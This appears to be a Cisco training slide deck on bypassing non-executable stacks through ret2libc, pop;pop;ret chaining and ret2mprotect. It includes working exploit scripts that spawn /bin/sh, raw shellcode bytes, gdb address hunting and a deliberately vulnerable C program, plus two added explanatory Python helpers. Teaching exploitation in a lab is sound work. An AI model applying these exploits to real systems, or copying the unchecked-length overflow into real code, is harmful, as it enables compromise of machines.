05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
* How to bypass X^W
* Why ASLR matters
1. Bypassing DEP: why ASLR matters
Alex Moneger, Security Engineer

2. Refresher
- Classic buffer overflows store the shellcode on the stack
- The shellcode is executed on the stack
- This requires the stack to be executable
- In modern OSes, the stack is not executable, because it is a data section
- Can we still exploit this?
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
3. Ret2libc
4. Approach
- Consider ASLR is disabled. What impact does this have?
- ASLR disabled = predictable addresses
- What can we do with predictable addresses? Maybe we can call them from the stack?
- What do we control which allows hijacking of control flow? SEIP (or a local function pointer) again!

5. Concepts
- We control SEIP (where we redirect the control flow to)
- But can we control the arguments passed to the function?
- How are arguments passed to functions? On the stack!
- A function expects its first argument at ebp+0x8
- Where are ebp and esp at control flow hijack time?
6. Stack registers
Function epilogue (return from the vulnerable function):
    mov esp,ebp
    pop ebp
    ret
Function prologue (the function we control):
    push ebp
    mov ebp,esp
After the prologue of our function, esp = ebp.

Register trace, with the values used on the slide (sebp = saved ebp), starting from esp = 0xa, ebp = 0xb, sebp = 0x41414141:
    1. mov esp,ebp          -> esp = 0xb, ebp = 0xb, sebp = 0x41414141
    2. pop ebp              -> esp = 0xb, ebp = 0x41414141
    3. ret                  -> esp = 0xb, ebp = 0x41414141
    4. push ebp; mov ebp,esp -> esp = 0xb, ebp = 0xb
7. What it looks like after the function prologue
- esp = ebp
- The function expects its first argument at ebp + 0x8
- The function expects SEIP at ebp + 0x4

Our stack frame at entry of our controlled function looks like this (higher addresses at the top):
    arg...
    arg1          <- EBP+0x8
    SEIP          <- EBP+0x4
    Func          <- EBP, ESP
    0x41414141
    0x41414141
    0x41414141
    0x41414141
    0x41414141
    0x41414141
8. Libc maybe?
- So we know we can call a function with arguments
- What library provides all core components? Libc!
- Let's use functions in libc to exploit our program
- A shell would be nice, let's use the system() function
- system() takes one argument, the binary to run; "/bin/sh" would do it?

9. Stack: system() example
- We need the address of system()
- We need the address of something pointing to "/bin/sh"
- How do we get a random string into our binary?
  1. Environment variables
  2. The "/bin/sh" string is in libc's address space

Frame at entry of system() (higher addresses at the top):
    &"/bin/sh"    <- EBP+0x8
    JUNK          <- EBP+0x4
    &system       <- EBP, ESP
    0x41414141
    0x41414141
    0x41414141
    0x41414141
    0x41414141
    0x41414141
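Slides 6, 7 and 9 reason about where ebp and esp end up after the epilogue/prologue pair, and why the callee then finds its "return address" at ebp+0x4 and its first argument at ebp+0x8. The model below is an added example, not code from the deck or the ch5 material: it implements the five instructions the slide traces on a small byte buffer, lays out the overflowed frame from slide 9, and reads back what the landed-in function sees. STACK_BASE, the buffer offset and the 108-byte buffer (108 + 4 bytes of saved ebp = the 112 filler bytes of slide 11) are constructed values; the three addresses come from slide 10.

```python
import struct

STACK_BASE = 0xBFFFF000   # constructed base address for the modelled stack page (assumption)


class Stack32:
    """Minimal model of a 32-bit little-endian stack: a byte buffer plus esp/ebp.
    Constructed for this example; it is not the page's code."""

    def __init__(self, size=0x100):
        self.mem = bytearray(size)
        self.esp = self.ebp = STACK_BASE

    def read32(self, addr):
        return struct.unpack_from("<I", self.mem, addr - STACK_BASE)[0]

    def write32(self, addr, value):
        struct.pack_into("<I", self.mem, addr - STACK_BASE, value & 0xFFFFFFFF)

    # The five instructions the slide traces.
    def mov_esp_ebp(self):
        self.esp = self.ebp

    def pop(self):
        value = self.read32(self.esp)
        self.esp += 4
        return value

    def ret(self):
        return self.pop()          # eip <- [esp]; esp += 4

    def push(self, value):
        self.esp -= 4
        self.write32(self.esp, value)

    def mov_ebp_esp(self):
        self.ebp = self.esp


def lay_out_overflowed_frame(st, buf_addr, buf_len, target, fake_seip, arg1):
    """Write the slide-9 frame: buffer full of 'A', saved ebp clobbered with 0x41414141,
    then &target (the overwritten SEIP), then the return address target will see, then arg1."""
    for off in range(0, buf_len, 4):
        st.write32(buf_addr + off, 0x41414141)
    saved_ebp_slot = buf_addr + buf_len
    st.write32(saved_ebp_slot, 0x41414141)      # saved ebp, overwritten
    st.write32(saved_ebp_slot + 4, target)      # SEIP of the vulnerable function
    st.write32(saved_ebp_slot + 8, fake_seip)   # what target will treat as its return address
    st.write32(saved_ebp_slot + 12, arg1)       # what target will treat as its first argument
    st.ebp = saved_ebp_slot                     # the vulnerable function's ebp points at its saved ebp
    st.esp = buf_addr


def hijack(st):
    """Run the vulnerable function's epilogue, then the prologue of the function we land in."""
    st.mov_esp_ebp()            # mov esp,ebp
    st.ebp = st.pop()           # pop ebp   -> ebp = 0x41414141
    eip = st.ret()              # ret       -> eip = target
    st.push(st.ebp)             # push ebp  (pushes the clobbered 0x41414141)
    st.mov_ebp_esp()            # mov ebp,esp
    return {
        "eip": eip,
        "esp_equals_ebp": st.esp == st.ebp,
        "at_ebp": st.read32(st.ebp),          # slot that held &target, now 0x41414141
        "seip_seen": st.read32(st.ebp + 4),   # where the callee expects its return address
        "arg1_seen": st.read32(st.ebp + 8),   # where the callee expects its first argument
    }


def demo():
    """Constructed frame: 108-byte buffer at STACK_BASE+0x10, addresses taken from slide 10."""
    st = Stack32()
    lay_out_overflowed_frame(st, STACK_BASE + 0x10, 108,
                             target=0xb7e9bf10, fake_seip=0xb7e8f550, arg1=0xb7f9a4f4)
    return hijack(st)


if __name__ == "__main__":
    for key, value in demo().items():
        shown = hex(value) if isinstance(value, int) and not isinstance(value, bool) else value
        print("%-16s %s" % (key, shown))
```

Running it shows the slide's picture in numbers: after the prologue esp == ebp, the slot at ebp holds 0x41414141 (the pushed, clobbered ebp), and the callee reads the JUNK/exit address at ebp+4 and the "/bin/sh" pointer at ebp+8, which is exactly why the exploit layout is &system, &exit, &"/bin/sh".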
10. Getting addresses
```
cisco@kali:~/src/seccon/ch5$ invoke -d ch5 $(python -c 'print "A"*128')
Reading symbols from /home/cisco/src/seccon/ch5/ch5...done.
gdb$ break main
Breakpoint 1 at 0x8048466: file ch5.c, line 12.
gdb$ r
Breakpoint 1, main (argc=2, argv=0xbffffdb4) at ch5.c:12
gdb$ p/x &system
$1 = 0xb7e9bf10
gdb$ p/x &exit
$2 = 0xb7e8f550
gdb$ find 0xb7e9bf10,+99999999,"/bin/sh"
0xb7f9a4f4
warning: Unable to access target memory at 0xb7fc15fc, halting search.
1 pattern found.
gdb$ q
```

11. The exploit
cisco@kali:~/src/seccon/ch5$ pygmentize -g ch5.py
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import struct as s

target = "ch5"
overflow_len = 112
system_addr = 0xb7e9bf10
exit_addr = 0xb7e8f550
sh_addr = 0xb7f9a4f4
target_path = os.path.abspath(target)

ex = 'A'*overflow_len
# Hijack flow to system()
ex += s.pack("<I", system_addr)
# SEIP in system() context, be clean, call exit()
ex += s.pack("<I", exit_addr)
# Address of "/bin/sh"
ex += s.pack("<I", sh_addr)
os.execve(target_path, (target_path, ex), os.environ)
```

12. What it does
- Hijacks flow to system() in libc
- Passes the address of "/bin/sh" as argv
- Puts the exit() address as the return address of system(). Exit cleanly
```
cisco@kali:~/src/seccon/ch5$ invoke ./ch5.py
$ exit
```
13. Chaining calls

14. One function call? Come on...
How could you chain function calls? You need to be able to:
  1. Remove the previous arguments from the stack
  2. Return to the next function
Introduce the pop;pop;ret construct:
  1. Remember pop? It allows control of ESP, thus removing elements from the stack
  2. ret effectively pops eip and jumps to it
Maybe we could use as many pops as function arguments and return after that?
15. pop;pop;ret construct
- The number of "pop reg" determines how many arguments are removed
- Allows chaining of function calls
- Need to find pop;pop;ret

A two-argument call chained into a one-argument call (lower addresses at the top):
    &func
    &pop;pop;ret    <- return address of func, gadget: pop reg; pop reg; ret
    arg1
    arg2
    &next_func
    &pop;ret        <- return address of next_func, gadget: pop reg; ret
    arg1
    &next_func
16. Finding pop;pop;ret
- Find all rets in a binary, and disassemble backwards
- Gives you an interesting set of elements to work with
```
cisco@kali:~$ objdump -d -j .text -M intel /lib/libc.so.6 | grep ret -B 3 > ch5.ggt
cisco@kali:~$ head ch5.ggt
   16c60:	55                   	push   ebp
   16c61:	89 e5                	mov    ebp,esp
   16c63:	5d                   	pop    ebp
   16c64:	c3                   	ret
--
   16ce7:	8b 7d fc             	mov    edi,DWORD PTR [ebp-0x4]
   16cea:	89 ec                	mov    esp,ebp
   16cec:	5d                   	pop    ebp
   16ced:	c3                   	ret
```

17. Nice ppr
Avoid:
  1. leave instructions before the ret (for now)
  2. pop ebp, if possible
They modify the stack. A nice one, which doesn't change the stack:
```
cisco@kali:~$ egrep "pop[[:space:]]+eax" -A 2 -B 1 ch5.ggt | tail -n 4
   d7f21:	59                   	pop    ecx
   d7f22:	58                   	pop    eax
   d7f23:	c3                   	ret
```
18. Running anything

19. I want to use my shellcode
- What if you want something that requires too much complexity? Something for which you already have a shellcode, maybe
- Can I execute a shellcode ret2libc style?
- You certainly can, under some classes of bugs
20. mprotect()
- Libc exposes mprotect()
- Allows setting the permissions of a page of memory
Prototype:
```c
#include <sys/mman.h>
int mprotect(void *addr, size_t len, int prot);
```
addr has to be aligned on a page boundary:
```
cisco@kali:~/src/seccon/ch5$ pygmentize -g ch5-mp.py | grep stack
stack_page = buf_addr & -0x1000
```

21. ret2mprotect
- Let's use mprotect() to change the permissions of the stack to RWE
- Then jump to our shellcode
Example:
- shellcode address: 0xbffffce8
- Page address: 0xbffffce8 & -0x1000 = 0xbffff000
- mprotect(0xbffff000, 0x1000, 0x7), RWE = 0x7
- Now that page of stack is RWE
- Jump to shellcode as usual => 0xbffffce8

Stack layout (lower addresses at the top):
    Shellcode
    0x41414141
    0x41414141
    0x41414141
    0x41414141
    &mprotect      <- overwritten SEIP
    &shellcode     <- return address of mprotect()
    &stack_page    <- arg 1: addr
    size           <- arg 2: len
    perms          <- arg 3: prot

22. Constraints
Vulnerabilities have to allow null bytes, because:
  1. Page boundaries contain null bytes by definition
  2. Size is a 32 bit integer
  3. Permissions is a 32 bit integer
All of the above contain null bytes.
23. Can you spot it?
cisco@kali:~/src/seccon/ch5$ pygmentize -g ch5-mp.c
```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

struct stuff {
    unsigned int len;
    char data[0x64];
};

char *vuln(FILE *fd)
{
    struct stuff s;
    memset(&(s.len), 0, sizeof(s.len));
    memset(&(s.data), 0, sizeof(s.data));
    fread(&(s.len), 0x4, 0x1, fd);
    printf("Data is %d bytes long\n", s.len);
    fread(&(s.data), s.len, 0x1, fd);
    printf("Got data from file: %s\n", &(s.data));
    char *p = &s + 0x4;
    return p;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        exit(1);
    }
    FILE *fd = fopen(argv[1], "r");
    char *p = vuln(fd);
    fclose(fd);
    return 0;
}
```
24. Compile and run
Looks like we control length and data:
```
cisco@kali:~/src/seccon/ch5$ cc ch5-mp.c -fno-stack-protector -U_fortify_SOURCE -g -o ch5-mp
cisco@kali:~/src/seccon/ch5$ python -c 'import struct as s; print s.pack("<I", 0x3)+"ABCD"' > /tmp/
cisco@kali:~/src/seccon/ch5$ ./ch5-mp /tmp/k
Data is 3 bytes long
Got data from file: ABC
dahtah@kali:~/src/seccon/ch5$ python -c 'import struct as s; print s.pack("<I", 0x100)+"A"*0x74+"B"*4' > /tmp/f
dahtah@kali:~/src/seccon/ch5$ invoke ch5-mp /tmp/f
Data is 256 bytes long
Got data from file: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB?@?????????跐??P?
Segmentation fault
cisco@kali:~/src/seccon/ch5$ dmesg | tail -n 1
[971014.298327] ch5-mp[27676]: segfault at 42424242 ip 42424242 sp bffffd60 error 14
```

25. GDB time
- We need our buffer address
- We need the libc mprotect address
```
cisco@kali:~/src/seccon/ch5$ invoke -d ch5-mp /tmp/f
Reading symbols from /home/cisco/src/seccon/ch5/ch5-mp...done.
gdb$ break vuln
Breakpoint 1 at 0x8048545: file ch5-mp.c, line 12.
gdb$ r
Breakpoint 1, vuln (fd=0x804a008) at ch5-mp.c:12
gdb$ p/x &(s.data)
$3 = 0xbffffce8
gdb$ p/x &mprotect
$2 = 0xb7f31e00
gdb$ q
```
26. Putting it together
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import struct as s

target = "ch5-mp"
target_file = "/tmp/f"
overflow_len = 0x74
mprotect_addr = 0xb7f31e00
buf_addr = 0xbffffce8
stack_page = buf_addr & -0x1000
page_size = 0x1000
rwe_perms = 0x7
target_path = os.path.abspath(target)

# setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0)
sc = ("\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46"
      "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"
      "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")

ex = sc
ex += 'A'*(overflow_len - len(sc))
ex += s.pack("<I", mprotect_addr)   # overwritten SEIP: return into mprotect()
ex += s.pack("<I", buf_addr)        # return address of mprotect(): the shellcode
ex += s.pack("<I", stack_page)      # addr
ex += s.pack("<I", page_size)       # len
ex += s.pack("<I", rwe_perms)       # prot = RWE

f = open(target_file, "wb")
f.write(s.pack("<I", len(ex)))
f.write(ex)
f.close()
os.execve(target_path, (target_path, target_file), os.environ)
```

27. Test
```
cisco@kali:~/src/seccon/ch5$ sudo sysctl -a | grep -i randomize
kernel.randomize_va_space = 0
cisco@kali:~/src/seccon/ch5$ readelf -l ch5-mp | grep STACK
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4
cisco@kali:~/src/seccon/ch5$ invoke ch5-mp.py
Data is 136 bytes long
Got data from file: j1X?̀?É?jFX̀? Rhn/shh//bi???̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$ exit
```
- We changed a stack page to RWE using mprotect
- We redirected to our shellcode
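The test slide checks the two preconditions by hand: kernel.randomize_va_space must be 0 and the binary's GNU_STACK header must say RW (no execute bit, i.e. DEP is on). The script below is an added example, not part of the deck or the ch5 material: it parses the PT_GNU_STACK program header straight out of an ELF image (32- or 64-bit, either byte order) and reads the sysctl, so both prerequisites can be checked mechanically on any binary. build_sample_elf produces a constructed minimal ELF for offline testing; treating a missing PT_GNU_STACK as an executable stack is the legacy x86 Linux default and is marked as an assumption in the code.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551          # p_type of the GNU_STACK program header
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4   # p_flags bits


def parse_program_headers(data):
    """Return (elf_class, list of program-header dicts) for an ELF image held in memory."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    elf_class, byte_order = data[4], data[5]      # class: 1 = ELF32, 2 = ELF64; order: 1 = LE, 2 = BE
    end = "<" if byte_order == 1 else ">"
    if elf_class == 1:
        (e_phoff,) = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
        fmt = end + "IIIIIIII"
        names = ("p_type", "p_offset", "p_vaddr", "p_paddr", "p_filesz", "p_memsz", "p_flags", "p_align")
    elif elf_class == 2:
        (e_phoff,) = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
        fmt = end + "IIQQQQQQ"
        names = ("p_type", "p_flags", "p_offset", "p_vaddr", "p_paddr", "p_filesz", "p_memsz", "p_align")
    else:
        raise ValueError("unknown ELF class %d" % elf_class)
    headers = []
    for i in range(e_phnum):
        values = struct.unpack_from(fmt, data, e_phoff + i * e_phentsize)
        headers.append(dict(zip(names, values)))
    return elf_class, headers


def flags_to_str(flags):
    """Render p_flags the way readelf does: R, W, E."""
    return "".join(ch for ch, bit in (("R", PF_R), ("W", PF_W), ("E", PF_X)) if flags & bit)


def stack_policy(data):
    """What the loader will do with this binary's stack, taken from PT_GNU_STACK (readelf -l | grep STACK)."""
    elf_class, headers = parse_program_headers(data)
    bits = 32 if elf_class == 1 else 64
    gnu_stack = [h for h in headers if h["p_type"] == PT_GNU_STACK]
    if not gnu_stack:
        # Assumption: no PT_GNU_STACK means the legacy x86 Linux default, an executable stack.
        return {"class": bits, "gnu_stack": False, "flags": "RWE", "executable": True}
    flags = gnu_stack[0]["p_flags"]
    return {"class": bits, "gnu_stack": True, "flags": flags_to_str(flags), "executable": bool(flags & PF_X)}


def aslr_level():
    """kernel.randomize_va_space as the slide's sysctl shows it: 0 = off, 1 = partial, 2 = full; None if unreadable."""
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def build_sample_elf(bits, stack_flags):
    """Constructed minimal ELF image (not a real binary) with one PT_GNU_STACK header, or none if stack_flags is None."""
    phnum = 0 if stack_flags is None else 1
    if bits == 32:
        ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\0" * 8
        ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0, 52, 32, phnum, 0, 0, 0)
        phdr = b"" if phnum == 0 else struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 4)
    else:
        ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8
        ehdr = ident + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0, 64, 0, 0, 64, 56, phnum, 0, 0, 0)
        phdr = b"" if phnum == 0 else struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr


if __name__ == "__main__":
    # Usage: python check_stack.py [path-to-elf]; without a path the constructed 32-bit RW sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf(32, PF_R | PF_W)
    policy = stack_policy(data)
    print("ELF%d GNU_STACK %s -> stack %s" % (policy["class"], policy["flags"],
                                            "EXECUTABLE" if policy["executable"] else "not executable"))
    print("kernel.randomize_va_space = %s" % aslr_level())
```

On the deck's target the output would read "ELF32 GNU_STACK RW -> stack not executable" and "kernel.randomize_va_space = 0": DEP present, ASLR off, which is exactly the combination the ret2mprotect slides rely on. A randomize_va_space of 2 is what breaks the hard-coded 0xb7f31e00 and 0xbffffce8.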
28. Take away

29. Conclusion
- DEP is trivial to bypass without ASLR
- You can run your shellcode in some circumstances
- mprotect is nice for runtime memory permission changes
- The mprotect trick doesn't work on grsec kernels

30. Exercise

31. Exercise time
- Exploit ch5 using standard ret2libc => call system()
- Do the same thing, but print some greeting before your shellcode. Exit cleanly
- Pick your favorite shellcode. Exploit ch5-mp using the mprotect() trick
- Can you make ch5-mp more reliable? How? Hint: what is that useless pointer there for?
- Why doesn't the above work? Read the ABI again ;)
Editor's notes
----- Meeting Notes (28/04/2014 16:14) ----- make clearer
----- Meeting Notes (28/04/2014 16:14) ----- Put comment or diagram